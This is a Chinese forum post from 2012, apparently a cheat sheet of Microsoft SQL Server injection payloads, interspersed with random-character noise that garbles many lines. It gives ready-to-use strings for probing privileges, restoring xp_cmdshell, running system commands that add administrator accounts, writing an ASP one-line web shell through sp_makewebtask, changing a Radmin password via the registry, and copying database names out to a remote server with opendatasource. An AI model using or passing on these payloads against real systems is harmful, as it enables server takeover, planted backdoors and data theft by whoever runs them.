//看看是什么权限的
) a5 H- V3 K0 {and 1=(Select IS_MEMBER('db_owner'))% C1 v: x5 o. O$ t
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--) M3 _) ?1 G ~0 _& U/ x* x2 b
- @9 C9 i0 t6 ~" O% {0 J l//检测是否有读取某数据库的权限
! B( Q$ g( S1 r: C7 ^% X( J3 {3 Tand 1= (Select HAS_DBACCESS('master'))
/ M ^+ N4 o0 Q4 aAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
* P! O$ j6 U! }6 Y! n9 m4 U2 R5 ~: i! p
' L. h6 Q% }! B6 [数字类型: k! e- x& H4 z( B% ~; n: [
and char(124)%2Buser%2Bchar(124)=0
; f! w+ N/ R! F! ^$ K* M
& ^0 D; ]2 x' e8 Y字符类型4 `, R8 i0 n, t- u# p% c2 H
' and char(124)%2Buser%2Bchar(124)=0 and ''=') h3 L. M5 P$ u4 I
" h8 q0 z! v! ~
搜索类型
; D2 {% G# ?; L2 Z4 }6 D, F' and char(124)%2Buser%2Bchar(124)=0 and '%'='; l. ?8 J; L$ u# q; y7 \) j9 I
9 s, A; ]2 |9 a
爆用户名. ?3 K- F7 W& Z v& m# `! B! _; U
and user>0
/ J! ^+ V( R1 E$ }4 T& L+ F) E' and user>0 and ''='
% o4 _# d4 N1 W% Z& h2 ~! K
' f$ l" {$ s2 W0 x检测是否为SA权限& a4 [# p: [* T6 y' Y' x
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
5 Y# W- ?; d. y% i0 i9 X, SAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
6 w9 v* p* F9 d# {
$ P R' l- `6 x7 K- ]/ A6 T) l C" t检测是不是MSSQL数据库
7 f- M" C. A% k7 [5 D! P# a, I2 Band exists (select * from sysobjects);--* b( ]0 M& W A" c8 q9 N M a
5 t2 T9 j" R6 d! l& Z! n' w
检测是否支持多行" m/ e5 C4 f$ \ n- U, L) O n
;declare @d int;--5 a/ S" H6 v3 U
# @# [5 h0 k9 A u1 ^8 S恢复 xp_cmdshell
" A+ o$ s- v7 t! _- T0 v1 V+ Y;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--! @' J! d0 h5 u( E. `. U
* u$ E. o3 K T- v# z( K: @/ K9 w5 e$ Q4 v$ V
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
0 h' W+ T3 ?1 t) d; r. o8 e( ^# [- S: g. }4 ?
//-----------------------3 q3 @5 s4 K0 x
// 执行命令$ x3 \. E7 B D$ q( y( f
//-----------------------
: E( @' w8 G5 N) C首先开启沙盘模式:+ P. f: D1 h3 B a2 v5 ^, Y2 I% \
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1" H8 `, e. M) ~' b
- k* |4 J- j' Q- S. f
然后利用jet.oledb执行系统命令' ^0 D; |4 `! W! N- i
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")'); l) U' V/ X+ x% k6 U: I
; |1 {9 t+ B+ B' \, i
执行命令" ^; w3 Y; g- {0 d6 ]3 ?
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
8 w0 C1 m6 a; e$ k( N- j. f. a* c) Q) R$ x) \
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
. C, m% w+ B6 Q3 P' s
' Z% ?+ ?' F( h$ \; x4 j# j+ [判断xp_cmdshell扩展存储过程是否存在:5 ~. t! E) D% m( ^$ W
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
. F! u9 G9 x* o$ P
. J3 I/ p7 h5 i! ]* D写注册表
+ t# _; y- [0 Vexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1. e4 u- l9 h+ k2 G, J, s
8 J/ H M1 N" PREG_SZ1 B |1 k* s, E# h" s
# Z' }; t0 V9 H1 } ]8 a" E读注册表
! ~, k. q* p2 Oexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'0 g: G. {, }- |3 T1 W6 o @
6 Y- d" f" ~* o; V6 P
读取目录内容
5 @7 t) Q$ p7 Jexec master..xp_dirtree 'c:\winnt\system32\',1,1
: N+ f: Q$ R2 O4 \' M) ^
4 h* W: d; M5 {3 h
- i$ \) ~' e" c4 A9 B数据库备份
: v; i: s7 t* G+ V) g kbackup database pubs to disk = 'c:\123.bak'
6 Z6 B' ?9 r+ e' N
, A/ u3 _; ?) z' ?' j5 f2 c//爆出长度( N2 P0 p/ r3 a4 x
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
, n" v: L* N/ Y1 e0 e
1 }& Y P8 k/ y& p
* z& [1 E) u o) d/ s: p. E) ~. e! O* H! T' O
更改sa口令方法:用sql综合利用工具连接后,执行命令:
2 L. m, s% u& ]/ q* ?exec sp_password NULL,'新密码','sa'. `* m7 f1 d' W7 Y5 H0 w
0 w ^; z' X4 Q& A6 k0 }& {' ~
添加和删除一个SA权限的用户test:
4 R: W( c- o- V" V/ e/ lexec master.dbo.sp_addlogin test,9530772
/ h2 A2 T9 n6 R; ~exec master.dbo.sp_addsrvrolemember test,sysadmin% R+ g0 _( S. ~: p w( \/ W0 i( H ^
/ n6 I1 `* i( W: L( G; k删除扩展存储过过程xp_cmdshell的语句:
& t( C9 e% w5 J- h7 Y/ s% bexec sp_dropextendedproc 'xp_cmdshell'
/ o2 D5 i' R% P0 b$ P( |! h9 ?6 R# D: e% W- Z! q, V( r+ d
添加扩展存储过过程
r: p4 v3 ^1 S9 M7 D9 jEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
9 k' F( X n; w- u4 x1 R' w8 ^GRANT exec On xp_proxiedadata TO public- k- H- y) _5 u/ f) G, t
$ `6 b* M! Y; L5 g7 \, i
2 [' a" T6 R7 R; @0 c. H4 c7 ?+ O停掉或激活某个服务。5 Y4 `5 W$ q3 ?5 B+ d
! F8 m* J) c( P# [( w2 kexec master..xp_servicecontrol 'stop','schedule'
* H% P1 o' @4 W( Kexec master..xp_servicecontrol 'start','schedule'5 G# ~% ?3 I) `8 Y3 ]& a
5 X/ {2 `( g. Rdbo.xp_subdirs0 s& q6 M. w/ ?2 c$ A
1 ?1 Q; K* W' f' c" Q1 K
只列某个目录下的子目录。: n0 _1 N' B0 U# Y
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'+ J% A" k. Z( m# l ]. S' V+ [
( w$ I; c* Y3 m) D5 Tdbo.xp_makecab
% P+ _% j9 k5 b, D' C! V, ]6 d' O
8 \; Y2 D; C) H; |$ _" l将目标多个档案压缩到某个目标档案之内。
3 a( r/ |$ i6 x$ ?; W% c9 R# o所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。' z) @0 K2 H6 \' @$ x- ~- ]' }
7 S6 b: P7 b9 t3 f+ s% r
dbo.xp_makecab* v/ A6 h1 E9 d
'c:\test.cab','mszip',1,
+ D' s l Q& {) x( |& _9 g'C:\Inetpub\wwwroot\SQLInject\login.asp',
# k& }7 G" i8 E" e# K'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'. B9 S* J! H, |
, f0 c% p% W0 O+ F' q
xp_terminate_process0 B6 f5 i6 B. b' A* E0 E7 o+ R9 w
+ b* S3 Y9 c! c+ _' Q5 _停掉某个执行中的程序,但赋予的参数是 Process ID。6 _! Y) k. {; G& p9 Y q) t
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID" S9 |5 a# V4 M/ P! ~' O* o
1 ^. i* m5 {) Z0 J: @: }+ ~xp_terminate_process 2484+ g- K4 V: K g3 S, d/ _
8 I' }+ Y D. C! H! q
xp_unpackcab
# \) e' [: ?4 `0 n }8 y5 P; }$ i8 u6 I& l9 G4 z
解开压缩档。
" [2 Z0 Z$ n' p; b9 q, {' ~, p1 t( Q( P6 }- ^4 g
xp_unpackcab 'c:\test.cab','c:\temp',1
; i3 N* w l% a0 x" `
9 K# G; r4 v+ ~4 N3 M
8 ~2 A0 m6 X, p* ^某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12348 }2 _, V) h3 x( d$ P6 k( `( ?
% Z8 ^$ m! l# n0 c4 p2 D, N* O4 acreate database lcx;
+ w/ J) u! X8 ?% |. X* H. M4 bCreate TABLE ku(name nvarchar(256) null);' Z) |9 Z& u' y$ ?: }- l
Create TABLE biao(id int NULL,name nvarchar(256) null);: ^( H+ U; L8 N' D/ b& W; P7 v
8 T# } J: _; v7 g M& m$ Q
//得到数据库名
& O2 Z( z0 I2 h& o8 h* d9 jinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
t- l& g( s, l3 N+ w; A. f7 ]8 B1 n+ S/ Z# y: ?# z0 I& o
6 N u4 u% [/ J//在Master中创建表,看看权限怎样, T/ ^& j6 Y1 X4 X9 W1 j, {
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--5 R6 ]+ n; v c/ G
: h% M5 S( _ S7 p用 sp_makewebtask直接在web目录里写入一句话马:
( j7 f* U, Q$ G' K) d9 Xhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--! M5 n9 e9 \1 E9 o- z
9 t0 F; p# V7 e& w# U6 t
//更新表内容( j& l8 v# X: J5 q. Y0 a* ~. A4 z
Update films SET kind = 'Dramatic' Where id = 123
) ]% e1 w( t, r4 i# f7 Y' `7 K. Q% ~/ C L
//删除内容. g* v |) }( l ~4 d4 Z1 V, k+ o
delete from table_name where Stockid = 3 |
发表于 2012-9-15 14:40:13
收藏
支持
反对